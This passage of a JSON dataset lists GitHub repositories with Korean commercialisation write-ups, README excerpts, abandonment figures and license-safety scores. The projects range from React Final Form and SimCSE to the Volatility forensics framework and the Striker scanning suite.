/var/www/remotely\nwget -q https://raw.githubusercontent.com/immense/Remotely/master/docker-compose/docker-compose.yml\ndocker-compose up -d\n```\n\n## Important: HTTPS and Reverse Proxies\n\nThe only supported reverse proxy is Caddy, and only when it is directl","composite_score":0.419,"license_safety_tag":"restricted"},{"name":"EYHN/hexo-helper-live2d","github_url":"https://github.com/EYHN/hexo-helper-live2d","stars":5,"language":"JavaScript","license":"GPL-2.0","abandonment_months":65,"description":"# EYHN/hexo-helper-live2d 분석\n\n## 왜 보물인가\n블로그에 움직이는 캐릭터를 쉽게 추가할 수 있는 도구로, 블로그의 시각적 매력을 높여 방문자 경험을 향상시킵니다.\n\n## 어디에 쓸 수 있나\n1. **블로그 꾸미기 SaaS**: 블로거들이 구독료를 내고 자신의 블로그에 애니메이션 캐릭터를 쉽게 추가하는 서비스\n2. **웹사이트 제작 도","readme_excerpt":"### The project is not actively maintained. Please try similar projects [stevenjoezhang/live2d-widget](https://github.com/stevenjoezhang/live2d-widget)\n\n# hexo-helper-live2d\n\n[![npm package][npm-package]][npm-package-url]\n[![dependencies][dependencies]][dependencies-url]\n[![devDependencies][devDependencies]][devDependencies-url]\n\n[![downloads-total][downloads-total]][downloads-total-url]\n[![downloads-month][downloads-month]][downloads-month-url]\n\n[![stars][stars]][stars-url]\n[![forks][forks]][forks-url]\n[![issues][issues]][issues-url]\n\n[![commitizen][commitizen]][commitizen-url]\n[![PRs][PRs]][PRs-url]\n[![license][license]][license-url]\n\n[![Backers on Open Collective](https://opencollective.com/hexo-helper-live2d/backers/badge.svg)](#backers)\n [![Sponsors on Open Collective](https://opencollective.com/hexo-helper-live2d/sponsors/badge.svg)](#sponsors) \n\nRead this in other languages: [English](README.md), [简体中文](README.zh-CN.md).\n\n<br>\n\nAdd the Sseexxyyy live2d to your hexo!\n\nDemo: [http","composite_score":0.4189,"license_safety_tag":"restricted"},{"name":"googlesamples/android-architecture-components","github_url":"https://github.com/googlesamples/android-architecture-components","stars":7,"language":"Kotlin","license":"Apache-2.0","abandonment_months":18,"description":"# googlesamples/android-architecture-components 분석\n\n## 왜 보물인가\n구글이 공식으로 제공하는 안드로이드 앱 설계 방법론으로, 안정적이고 유지보수하기 쉬운 모바일 앱을 만드는 표준 청사진입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 모바일 앱 개발 교육 플랫폼에서 이 구조를 기반으로 한 온라인 강좌","readme_excerpt":"Android Architecture Components samples\n===================================\n\nA collection of samples using the [Architecture Components](https://developer.android.com/arch):\n\n- [Room](https://developer.android.com/topic/libraries/architecture/room)\n- [Lifecycle-aware components](https://developer.android.com/topic/libraries/architecture/lifecycle)\n- [ViewModels](https://developer.android.com/topic/libraries/architecture/viewmodel)\n- [LiveData](https://developer.android.com/topic/libraries/architecture/livedata)\n- [Paging](https://developer.android.com/topic/libraries/architecture/paging/)\n- [Navigation](https://developer.android.com/topic/libraries/architecture/navigation/)\n- [ViewBinding](https://developer.android.com/topic/libraries/view-binding)\n- [WorkManager](https://developer.android.com/topic/libraries/architecture/workmanager/)\n\n### Samples\n\n* **[BasicSample](https://github.com/googlesamples/android-architecture-components/blob/master/BasicSample)** - Shows how to persist data ","composite_score":0.4189,"license_safety_tag":"safe"},{"name":"jwasham/computer-science-flash-cards","github_url":"https://github.com/jwasham/computer-science-flash-cards","stars":16,"language":"HTML","license":"CC-BY-SA-4.0","abandonment_months":17,"description":"# Computer Science Flash Cards 분석\n\n## 왜 보물인가\n컴퓨터 과학을 배우는 학생들이 중요한 개념을 빠르게 암기하고 복습할 수 있도록 정리된 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 학습 SaaS**: 플래시카드 기반 학습 앱에 콘텐츠를 통합하여 구독형 서비스로 제공\n2. **대학 강의 보조 도구**: 교수","readme_excerpt":"# Computer Science Flash Cards\n\nThis is a little website I've put together to allow me to easily make flash cards and quiz myself for memorization of:\n\n- General cs knowledge\n  - vocabulary\n  - definitions of processes\n  - powers of 2\n  - design patterns\n- Code\n  - data structures\n  - algorithms\n  - solving problems\n  - bitwise operations\n\nWill be able to use it on:\n\n- desktop\n- mobile (phone and tablet)\n\nIt uses:\n\n- Python 3\n- Flask\n- SQLite\n\n---\n\n## About the Site\n\nHere's a brief rundown: https://startupnextdoor.com/flash-cards-site-complete/\n\n## Screenshots\n\nUI for listing cards. From here you can add and edit cards.\n\n![Card UI](screenshots/cards_ui-1467754141259.png)\n\n---\n\nThe front of a General flash card.\n\n![Memorizing general knowledge](screenshots/memorize_ui-1467754306971.png)\n\n---\n\nThe reverse (answer side) of a Code flash card.\n\n![Code view](screenshots/memorize_code-1467754962142.png)\n\n## Important Note\n\nThe set included in this project (**cards-jwasham.db**) is not my full","composite_score":0.4185,"license_safety_tag":"unknown"},{"name":"UltimateHackers/Striker","github_url":"https://github.com/UltimateHackers/Striker","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":36,"description":"# Striker 분석 보고서\n\n## 왜 보물인가\n네트워크 침투 테스트를 자동화하는 오픈소스 도구로, 보안 취약점을 찾아내는 작업을 누구나 쉽게 수행할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업 대상 자동 보안 진단 서비스로 월정액 구독 모델 운영\n2. **내부 업무 도구**: 대기업 정보보안팀이 자체 시스템 점검용 커","readme_excerpt":"<h1 align=\"center\">\n  <br>\n  <a href=\"https://github.com/s0md3v/Striker\"><img src=\"https://i.ibb.co/txcs4JL/striker.png\" alt=\"Striker\"></a>\n  <br>\n  Striker\n  <br>\n</h1>\n\n<h4 align=\"center\">Recon & Vulnerability Scanning Suite</h4>\n\n<p align=\"center\">\n  <a href=\"https://github.com/s0md3v/Striker/releases\">\n    <img src=\"https://img.shields.io/github/release/s0md3v/Striker.svg\">\n  </a>\n  <a href=\"https://travis-ci.com/s0md3v/Striker\">\n    <img src=\"https://img.shields.io/travis/com/s0md3v/Striker.svg\">\n  </a>\n  <a href=\"https://github.com/s0md3v/Striker/issues?q=is%3Aissue+is%3Aclosed\">\n      <img src=\"https://img.shields.io/github/issues-closed-raw/s0md3v/Striker.svg\">\n  </a>\n</p>\n\n### Important Notice\nStriker 2.0 is still in prototype phase, which means it's not intended to be used by regular users. It has been made public for contrbutions to make the development faster.\\\n**Usage:** `python3 striker.py example.com`\n\n### Workflow\n##### Phase 1: Attack Surface Discovery\nThis phase inclu","composite_score":0.4184,"license_safety_tag":"restricted"},{"name":"huaxz1986/APUE_notes","github_url":"https://github.com/huaxz1986/APUE_notes","stars":11,"language":"","license":"gpl-3.0","abandonment_months":89,"description":"","readme_excerpt":"<!--\n    作者：华校专\n    email: huaxz1986@163.com\n**  本文档可用于个人学习目的，不得用于商业目的  **\n-->\n<i>By huaxz1986@163.com</i>\n# 《UNIX环境高级编程》第三版中文笔记\n\n该笔记来自于本人的学习笔记。\n\n另：本人搜集了个人笔记并整理成册，命名为《AI算法工程师手册》，详见:www.huaxiaozhuan.com\n\n## 缘由\n\n《UNIX环境高级编程》本人在多年以前多次阅读了，当时还是中文第二版。经过多年的工作和编程经验以后，发现有一些基本的概念还需要在这本书里面追寻。于是抽空重读第三版，写下这篇笔记。\n\n本笔记来自于《UNIX环境高级编程》中文第三版。主要做了以下工作：\n\n- 提炼了内容。内容更加精简\n- 重新组织了下知识点结构\n- 有些晦涩部分，重新用通俗易懂的话来解释\n- 基本上每个知识点都有示例代码，以及运行结果的截图\n- 所有的代码都在 `codes`文件夹下。代码均有文档说明。采用`Doxygen`自动化文档工具自动化生成文档。可以使用`Doxywizard`工具生成文档。\n\n文档内容如下所示：\n\t![](./markdown.JPG)\n\n源代码如下所示：\n\t![](./source_code.JPG)\n\n注释文档如下所示：\n\t![](./source_html.JPG)\n\n\n## 运行环境\n\n- 操作系统： ubutnu 16.04\n- 编辑器： QtCreator\n\n## 章节目录：\n1. UNIX基础知识\n\t- UNIX系统\n\t- 错误处理\n\t- 时间\n2. UNIX标准及实现\n\t- UNIX标准\n\t- 限制\n3. 文件IO：不带缓冲的IO\n\t- 打开、创建、关闭文件\n\t- 定位、读、写文件\n\t- 原子操作、同步、复制、修改文件描述符\n4. 文件和目录\n\t- stat 结构和权限相关\n\t- 访问测试和文件模式创建屏蔽字\n\t- 修改文件访问权限和文件所属用户\n\t- 修改文件长度\n\t- UNIX文件系统、硬链接、软链接、删除、重命名\n\t- 修改文件的时间\n\t- 目录操作\n5. 标准IO库\n\t- 流和FILE对象\n\t- 打开关闭流\n\t- 读写流\n\t- 格式化IO\n\t- 其他\n6. 系统数据文件和信息\n\t- 系统文件\n\t- 时间和日期\n7. 进程环境\n\t- 进程相关\n","composite_score":0.4183,"license_safety_tag":"restricted"},{"name":"fossasia/badgeyay","github_url":"https://github.com/fossasia/badgeyay","stars":12,"language":"JavaScript","license":"GPL-3.0","abandonment_months":39,"description":"# Badgeyay 프로젝트 분석\n\n## 왜 보물인가\n행사나 교육 현장에서 참가자들이 착용할 수 있는 디지털 배지를 자동으로 만들어주는 도구로, 번거로운 수작업을 빠르게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 온라인 강좌 수료자에게 자동으로 수료증 배지를 발급하는 SaaS 서비스\n2. **행사 관리 회사**: 대규","readme_excerpt":"# Badgeyay\n\n![Badgeyay](/frontend/public/images/Badgeyay-artwork.png)\n\n[![Gitter](https://img.shields.io/badge/chat-on%20gitter-ff006f.svg?style=flat-square)](https://gitter.im/fossasia/badgeyay)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/1ac554483fac462797ffa5a8b9adf2fa?style=flat-square)](https://www.codacy.com/app/fossasia/badgeyay)\n[![Build Status](https://api.travis-ci.org/fossasia/badgeyay.svg?branch=development&style=flat-square)](https://travis-ci.org/fossasia/badgeyay)\n[![Mailing](https://img.shields.io/badge/Mailing-List-red.svg)](https://groups.google.com/forum/#!forum/open-event)\n\n> **Badgeyay provides an interface to event organizers for generating badges of events from concerts to conferences and meet-ups.**\n\nBadgeyay is a Badge generator with a simple web UI to add data and generate printable badges in a PDF.\n\nThe user can:\n\n- Choose the size of the badges\n- Choose the background of the badges and upload the logo and the background image\n- Upload a CSV f","composite_score":0.4182,"license_safety_tag":"restricted"},{"name":"cyclic-software/starter-nestjs","github_url":"https://github.com/cyclic-software/starter-nestjs","stars":17,"language":"TypeScript","license":"NOASSERTION","abandonment_months":24,"description":"","readme_excerpt":"","composite_score":0.418,"license_safety_tag":"unknown"},{"name":"erikras/react-final-form","github_url":"https://github.com/erikras/react-final-form","stars":33,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# React Final Form 상용화 분석\n\n## 왜 보물인가\n웹사이트의 '입력 양식'(회원가입, 로그인, 설문조사 등)을 쉽게 만들고 관리할 수 있는 도구로, 개발자들이 반복적인 작업을 줄여 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (고객관리 플랫폼)**\n- 기업들이 고객 정보를 입력·수정할 때 필요한","readme_excerpt":"# 🏁 React Final Form\n\n[![React Final Form](banner.png)](https://final-form.org/react)\n\n[![Backers on Open Collective](https://opencollective.com/final-form/backers/badge.svg)](#backers) [![Sponsors on Open Collective](https://opencollective.com/final-form/sponsors/badge.svg)](#sponsors) [![NPM Version](https://img.shields.io/npm/v/react-final-form.svg?style=flat)](https://www.npmjs.com/package/react-final-form)\n[![NPM Downloads](https://img.shields.io/npm/dm/react-final-form.svg?style=flat)](https://www.npmjs.com/package/react-final-form)\n[![Build Status](https://travis-ci.org/final-form/react-final-form.svg?branch=master)](https://travis-ci.org/final-form/react-final-form)\n[![codecov.io](https://codecov.io/gh/final-form/react-final-form/branch/master/graph/badge.svg)](https://codecov.io/gh/final-form/react-final-form)\n[![styled with prettier](https://img.shields.io/badge/styled_with-prettier-ff69b4.svg)](https://github.com/prettier/prettier)\n\n✅ Zero dependencies (that affect your bund","composite_score":0.4178,"license_safety_tag":"safe"},{"name":"muckSponge/MaterialFox","github_url":"https://github.com/muckSponge/MaterialFox","stars":6,"language":"CSS","license":"MIT","abandonment_months":20,"description":"# MaterialFox 사업화 분석\n\n## 왜 보물인가\n파이어폭스 브라우저의 외관을 현대적이고 깔끔하게 개선해주는 도구로, 수백만 파이어폭스 사용자들이 더 나은 사용 경험을 원할 때 필요한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 IT 관리 서비스**: 회사 직원들의 브라우저를 통일된 디자인으로 관리하고 커스터마이징해주는 구독 서비스\n2. ","readme_excerpt":"# MaterialFox\n*A Material Design-inspired userChrome.css theme for Firefox*\n\n![Preview](https://user-images.githubusercontent.com/5405629/45172944-21d91900-b24a-11e8-8bc5-03814121b0de.png)\nThis theme is powered by blood, sweat, and coffee. If you like it, please consider helping out to support its continued development.\n\n[![Buy me a coffee](https://svgshare.com/i/8Yd.svg)](https://www.buymeacoffee.com/n4ho5QX2l)\n\n## What this does\nInspired by Google's Material Design and their latest Google Chrome UI, this theme turns your Firefox into a Material-styled web browser. The aim was to style the browser as closely as possible to Google Chrome, where practical.\n\nThis is a userChrome.css theme, which means you must manually add it to your Firefox profile. The theme overrides certain browser styles. Currently, only the main UI is affected (settings pages, etc. are not). More elements of the UI may be styled in the future but a broader scope becomes harder to maintain as Mozilla updates their b","composite_score":0.4175,"license_safety_tag":"safe"},{"name":"wepe/MachineLearning","github_url":"https://github.com/wepe/MachineLearning","stars":5,"language":"Python","license":"unknown","abandonment_months":24,"description":"# MachineLearning 저장소 분석\n\n## 왜 보물인가\n데이터 분석과 예측 기술을 손쉽게 구현할 수 있어서, 복잡한 통계 없이도 비즈니스 의사결정을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 구매 패턴을 자동으로 분석해 개인화된 상품 추천 서비스 제공\n2. **내부 업무 도구**: 회사 매출 데이터를 분석","readme_excerpt":"MachineLearning\n====================\n\n\n\n一些常见的机器学习算法的实现代码，本人学习过程中做的总结，资历尚浅，如有错误请不吝指出。\n\n\n## 目录介绍\n\n- **DeepLearning Tutorials**\n\n   这个文件夹下包含一些深度学习算法的实现代码，以及具体的应用实例，包含：\n\n   [dive_into _keras](https://github.com/wepe/MachineLearning/tree/master/DeepLearning%20Tutorials/dive_into_keras) Keras使用进阶。介绍了怎么保存训练好的CNN模型，怎么将CNN用作特征提取，怎么可视化卷积图。[文章链接](http://blog.csdn.net/u012162613/article/details/45581421)， 更多进阶使用方法：[gist](https://gist.github.com/wepe/a05ad572dca002046de443061909ff7a)\n      \n   [keras_usage](https://github.com/wepe/MachineLearning/tree/master/DeepLearning%20Tutorials/keras_usage) 介绍了一个简单易用的深度学习框架keras，用经典的Mnist分类问题对该框架的使用进行说明，训练一个CNN，总共不超过30行代码。[文章链接](http://blog.csdn.net/u012162613/article/details/45397033)\n\n   [FaceRecognition_CNN(olivettifaces)](https://github.com/wepe/MachineLearning-Demo/tree/master/DeepLearning%20Tutorials/FaceRecognition_CNN(olivettifaces))\n      将卷积神经网络CNN应用于人脸识别的一个demo，人脸数据库采用olivettifaces，CNN模型参考LeNet5，基于python+theano+numpy+PIL实现。详细介绍这个demo的文章：[文章链接](http:","composite_score":0.4172,"license_safety_tag":"unknown"},{"name":"fossasia/susper-artwork","github_url":"https://github.com/fossasia/susper-artwork","stars":12,"language":"Java","license":"GPL-3.0","abandonment_months":38,"description":"# Susper Artwork 프로젝트 분석\n\n## 왜 보물인가\n검색 엔진 프로젝트의 시각 자료 모음으로, 오픈소스 프로젝트에 필요한 디자인 아이디어를 무료로 재사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **오픈소스 프로젝트 지원 서비스**: 스타트업들이 로고와 배너 디자인이 필요할 때 기성 자료 라이브러리로 제공\n2. **교육용 디자인 플랫폼*","readme_excerpt":"# Neurolab Android App\n\nRepository of Android app for the Neurolab Open Hardware platform.\n\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/04c9c47bfb934605ab15394dd2f260be)](https://app.codacy.com/app/fossasia/neurolab-android?utm_source=github.com&utm_medium=referral&utm_content=fossasia/neurolab-android&utm_campaign=Badge_Grade_Settings)\n[![Build Status](https://travis-ci.org/fossasia/neurolab-android.svg?branch=master)](https://travis-ci.org/fossasia/neurolab-android)\n[![Gitter](https://badges.gitter.im/fossasia/neurolab.svg)](https://gitter.im/fossasia/neurolab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nThis repository holds the Android app for the Neurolab Hardwa","composite_score":0.417,"license_safety_tag":"restricted"},{"name":"munusphp/munus","github_url":"https://github.com/munusphp/munus","stars":5,"language":"PHP","license":"MIT","abandonment_months":18,"description":"# munusphp/munus 분석 리포트\n\n## 왜 보물인가\nPHP라는 웹 개발 언어에서 함수형 프로그래밍이라는 고급 기법을 쉽게 사용할 수 있게 해주는 도구로, 복잡한 웹 서비스를 더 안정적으로 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **금융/결제 서비스**: 거래 데이터를 안전하게 처리하는 웹 애플리케이션의 핵심 엔진으로 판매\n2. **기","readme_excerpt":"# Munus\n\n[![Minimum PHP Version](https://img.shields.io/badge/php-%3E%3D%208.1-8892BF.svg)](https://php.net/)\n[![github action](https://github.com/munusphp/munus/workflows/build/badge.svg)](https://github.com/munusphp/munus/actions?query=workflow%3Abuild)\n[![Latest Stable Version](https://poser.pugx.org/munusphp/munus/v/stable?format=flat)](https://packagist.org/packages/munusphp/munus)\n[![codecov](https://codecov.io/gh/munusphp/munus/branch/master/graph/badge.svg)](https://codecov.io/gh/munusphp/munus)\n[![Total Downloads](https://poser.pugx.org/munusphp/munus/downloads?format=flat)](https://packagist.org/packages/munusphp/munus)\n![GitHub](https://img.shields.io/github/license/munusphp/munus)\n\nPower of object-oriented programming with the elegance of functional programming.\nIncrease the robustness with reduced amount of code.\n\nAt the moment, in the experimental phase.\n\n**[Documentation](https://munusphp.github.io/docs/start)**\n\nDue to the lack of generic types, Munus achieves genericit","composite_score":0.4168,"license_safety_tag":"safe"},{"name":"princeton-nlp/SimCSE","github_url":"https://github.com/princeton-nlp/SimCSE","stars":6,"language":"Python","license":"MIT","abandonment_months":20,"description":"# SimCSE 저장소 분석\n\n## 왜 보물인가\n텍스트의 의미를 컴퓨터가 이해하도록 학습시키는 핵심 기술로, 검색·추천·분류 등 거의 모든 AI 서비스의 기반이 됩니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 이메일 자동 분류, 고객 리뷰 감정 분석, 유사 문서 자동 찾기 등의 웹 기반 도구\n2. **내부 업무 도구**: 회사 자료실에서","readme_excerpt":"## SimCSE: Simple Contrastive Learning of Sentence Embeddings\n\nThis repository contains the code and pre-trained models for our paper [SimCSE: Simple Contrastive Learning of Sentence Embeddings](https://arxiv.org/abs/2104.08821).\n\n**************************** **Updates** ****************************\n\n<!-- Thanks for your interest in our repo! -->\n\n<!-- Probably you will think this as another *\"empty\"* repo of a preprint paper 🥱.\nWait a minute! The authors are working day and night 💪, to make the code and models available, so you can explore our state-of-the-art sentence embeddings.\nWe anticipate the code will be out * **in one week** *. -->\n\n<!-- * 4/26: SimCSE is now on [Gradio Web Demo](https://gradio.app/g/AK391/SimCSE) (Thanks [@AK391](https://github.com/AK391)!). Try it out! -->\n* 8/31: Our paper has been accepted to EMNLP! Please check out our [updated paper](https://arxiv.org/pdf/2104.08821.pdf) (with updated numbers and baselines). \n* 5/12: We updated our [unsupervised models](","composite_score":0.4166,"license_safety_tag":"safe"},{"name":"Perfare/UnityStudio","github_url":"https://github.com/Perfare/UnityStudio","stars":5,"language":"C#","license":"mit","abandonment_months":42,"description":"# UnityStudio 상용화 분석\n\n## 왜 보물인가\n게임 개발자들이 복잡한 게임 파일을 쉽게 분석하고 수정할 수 있게 해주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 게임 파일 분석 플랫폼 - 게임사들이 웹브라우저에서 파일을 업로드하면 자동으로 분석 결과를 제공\n2. **내부 업무 도구**: 게임 개발","readme_excerpt":"# AssetStudio\n[![Build status](https://ci.appveyor.com/api/projects/status/rnu7l90422pdewx4?svg=true)](https://ci.appveyor.com/project/Perfare/assetstudio/branch/master/artifacts)\n\n**None of the repo, the tool, nor the repo owner is affiliated with, or sponsored or authorized by, Unity Technologies or its affiliates.**\n\nAssetStudio is a tool for exploring, extracting and exporting assets and assetbundles.\n\n## Features\n* Support version:\n  * 3.4 - 2022.1\n* Support asset types:\n  * **Texture2D** : convert to png, tga, jpeg, bmp\n  * **Sprite** : crop Texture2D to png, tga, jpeg, bmp\n  * **AudioClip** : mp3, ogg, wav, m4a, fsb. support convert FSB file to WAV(PCM)\n  * **Font** : ttf, otf\n  * **Mesh** : obj\n  * **TextAsset**\n  * **Shader**\n  * **MovieTexture**\n  * **VideoClip**\n  * **MonoBehaviour** : json\n  * **Animator** : export to FBX file with bound AnimationClip\n\n## Requirements\n\n- AssetStudio.net472\n   - [.NET Framework 4.7.2](https://dotnet.microsoft.com/download/dotnet-framework/ne","composite_score":0.4166,"license_safety_tag":"safe"},{"name":"iotaledger/wallet","github_url":"https://github.com/iotaledger/wallet","stars":8,"language":"JavaScript","license":"GPL-3.0","abandonment_months":64,"description":"# IOTA Ledger Wallet 분석 보고서\n\n## 왜 보물인가\n암호화폐를 안전하게 보관하고 거래할 수 있는 기술로, 금융 보안이 중요한 모든 조직에서 필요로 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래소 SaaS**: 소규모 거래소가 자체 플랫폼에 통합하여 사용자 자산 관리 기능 제공\n2. **기업용 자산 관리 도구**: 대기업의 암","readme_excerpt":"# IOTA App\n\n**WARNING:** This wallet is now deprecated. Please use https://github.com/iotaledger/trinity-wallet instead.\n\n## Prerequisites\n\n1. Download [NodeJS](https://nodejs.org/en/download/)\n\n2. Install [Electron](http://electron.atom.io):\n\n  ```\n  npm install -g electron\n  ```\n\n3. Install [Bower](https://bower.io/):\n\n  ```\n  npm install -g bower\n  ```\n\n#### Windows Users Only\n\n  Run the following command as Administrator:\n\n  ```\n  npm install -g --production windows-build-tools\n  ```\n\n#### Compiling\n\nIf you wish to compile the app, install the following also: \n\n1. Install [Electron Builder](https://github.com/electron-userland/electron-builder)\n\n Electron Builder is used behind the scenes. Read their [instructions](https://github.com/electron-userland/electron-builder/wiki/Multi-Platform-Build) on how to set up your system.\n\n2. Install [Docker](https://www.docker.com)\n\n## Instructions\n\n1. Clone this repository:\n\n  ```\n  git clone https://github.com/iotaledger/wallet\n  ```\n\n2. Go to","composite_score":0.4166,"license_safety_tag":"restricted"},{"name":"microsoft/ImagineCup","github_url":"https://github.com/microsoft/ImagineCup","stars":8,"language":"","license":"MIT","abandonment_months":21,"description":"# microsoft/ImagineCup 분석\n\n## 왜 보물인가\n마이크로소프트의 공식 프로젝트로, AI와 창의성을 결합한 기술을 배우고 활용할 수 있는 신뢰할 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 학생·창업가를 위한 AI 교육 플랫폼으로 운영하여 월 구독료 수취\n- **내부 업무 도구**: 기업의 신입 교육이나","readme_excerpt":"## Welcome to the supported learning and information for the Imagine Cup Competition!\n\n![Image](https://github.com/microsoft/ImagineCup/blob/main/ImagineCupHeader.png)\n\nMicrosoft believes the next great thing could come from anyone, at any time. Now in its **22nd** year with nearly 2 million past competitors worldwide, the 2024 Imagine Cup has launched as the global technology startup competition for visionary student entrepreneurs harnessing the power of AI.\n\nBuild with AI through access to technology, receive expert technical and entrepreneurial mentorship, and the chance to win USD100,000 and an exclusive mentorship session with Microsoft CEO, Satya Nadella. It's your moment to accelerate your startup and showcase your visionary ideas on the global stage!\n\nKickstart your Imagine Cup journey by submitting your innovative AI startup idea. Qualify for Founders Hub, access USD1,000 of Azure credits and USD2,500 of OpenAI credits and self-paced training to transform your ideas into impac","composite_score":0.4158,"license_safety_tag":"safe"},{"name":"lume/autolayout","github_url":"https://github.com/lume/autolayout","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":21,"description":"# lume/autolayout 상용화 분석\n\n## 왜 보물인가\n복잡한 앱 화면을 자동으로 정렬하는 기술로, 앱 개발자들이 손으로 일일이 배치하던 작업을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 노코드 앱 빌더 SaaS**\n- 드래그 앤 드롭으로 앱을 만드는 플랫폼에 탑재하여 사용자가 자동 정렬 기능을 이용하게 함\n\n**2. 디","readme_excerpt":"# @lume/autolayout\n\n<!-- ![Logo](logo.png) -->\n\nLUME AutoLayout implements Apple's [Auto Layout](https://developer.apple.com/library/ios/documentation/UserExperience/Conceptual/AutolayoutPG/index.html) and [Visual Format Language](https://developer.apple.com/library/ios/documentation/UserExperience/Conceptual/AutolayoutPG/VisualFormatLanguage.html) in Javascript (TypeScript), and will soon compile to WebAssembly via [AssemblyScript](http://assemblyscript.org/) for optimized layout calculation.\n\n<h4><code><strong>npm install @lume/autolayout</strong></code></h4>\n\nAuto layout is a system which lets you perform layout using mathematical relationships (constraints). It uses the [LUME Kiwi](https://github.com/lume/kiwi) library to do the actual constraint resolving and implements Apple's constraint system and Visual Format Language (vfl) on top of that. It supports the [Extended VFL syntax](#extended-visual-format-language-evfl), including view-stacks and z-indexing.\n\n```js\n// Define the la","composite_score":0.4158,"license_safety_tag":"safe"},{"name":"ossu/data-science","github_url":"https://github.com/ossu/data-science","stars":11,"language":"","license":"NOASSERTION","abandonment_months":13,"description":"# ossu/data-science 저장소 분석\n\n## 왜 보물인가\n데이터 분석 분야를 체계적으로 배우고 싶은 사람들을 위해 전문가가 엄선한 무료 학습 자료들을 한곳에 모아놓은 교육 가이드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼(SaaS)**: 이 학습 경로를 기반으로 체계적인 데이터 분석 강좌 구독 서비스 구축\n2. **기업 직원","readme_excerpt":"<div align=\"center\" style=\"text-align: center\">\n<img src=\"http://i.imgur.com/kYYCXtC.png\" alt=\"Open Source Society logo\"/>\n<h3>Open Source Society University</h3>\n<p>\n  :bar_chart: Path to a free self-taught education in <strong>Data Science</strong>!\n</p>\n<p>\n  <a href=\"https://github.com/open-source-society/data-science\">\n    <img alt=\"Open Source Society University - Data Science\" src=\"https://img.shields.io/badge/OSSU-data--science-blue.svg\">\n  </a>\n</p>\n</div>\n\n## Contents\n\n- [About](#about)\n- [Curricular Guideline](#curricular-guideline)\n- [How to use this guide](#how-to-use-this-guide)\n- [Community](#community)\n- [Prerequisites](#prerequisites)\n- [Curriculum](#curriculum)\n- [How to contribute](#how-to-contribute)\n- [Code of conduct](#code-of-conduct)\n- [Team](#team)\n\n## About\n\nThis is a path for those of you who want to complete the Data Science undergraduate curriculum on your own time, **for free**, with courses from the **best universities** in the World.\n\nIn our curriculum, ","composite_score":0.4153,"license_safety_tag":"unknown"},{"name":"coryhouse/react-slingshot","github_url":"https://github.com/coryhouse/react-slingshot","stars":5,"language":"JavaScript","license":"mit","abandonment_months":32,"description":"# React Slingshot 분석 보고서\n\n## 왜 보물인가\n웹사이트나 웹 애플리케이션을 빠르게 만들기 위한 완성된 개발 환경 템플릿으로, 개발자들이 처음부터 모든 것을 직접 설정하는 번거로움을 없애줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 협업 도구나 프로젝트 관리 웹사이트의 빠른 프로토타입 개발\n- **내부 업무 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://cloud.githubusercontent.com/assets/3129129/22811426/bb69dc06-ef0c-11e6-8092-a0bea9060b35.png\"/>\n</p>\n\n---\n\n[![Build status: Linux](https://img.shields.io/travis/coryhouse/react-slingshot.svg?style=flat-square)](https://travis-ci.org/coryhouse/react-slingshot)\n[![Build status: Windows](https://img.shields.io/appveyor/ci/coryhouse/react-slingshot/master.svg?style=flat-square)](https://ci.appveyor.com/project/coryhouse/react-slingshot/branch/master)\n[![Dependency Status](https://david-dm.org/coryhouse/react-slingshot.svg?style=flat-square)](https://david-dm.org/coryhouse/react-slingshot)\n[![Coverage Status](https://img.shields.io/coveralls/coryhouse/react-slingshot/master.svg?style=flat-square)](https://coveralls.io/github/coryhouse/react-slingshot?branch=master)\n\nA comprehensive starter kit for rapid application development using React.\n\nWhy Slingshot?\n\n1. **One command to get started** - Type `npm start` to start development in your default browser","composite_score":0.4153,"license_safety_tag":"safe"},{"name":"volatilityfoundation/volatility","github_url":"https://github.com/volatilityfoundation/volatility","stars":5,"language":"Python","license":"gpl-2.0","abandonment_months":12,"description":"# Volatility Foundation 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 비정상 작동할 때 범죄 증거나 해킹 흔적을 찾아내는 세계 최고의 수사 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 디지털 포렌식 분석 플랫폼 (기업이 의심 사건 발생 시 온라인으로 접근)\n2. **내부 업무 도구**: 금융사/대기업의 ","readme_excerpt":"This project is archived. See Volatility 3 for modern investigations: https://github.com/volatilityfoundation/volatility3\n\n============================================================================\nVolatility Framework - Volatile memory extraction utility framework\n============================================================================\n\nThe Volatility Framework is a completely open collection of tools,\nimplemented in Python under the GNU General Public License, for the\nextraction of digital artifacts from volatile memory (RAM) samples.\nThe extraction techniques are performed completely independent of the\nsystem being investigated but offer visibilty into the runtime state\nof the system. The framework is intended to introduce people to the\ntechniques and 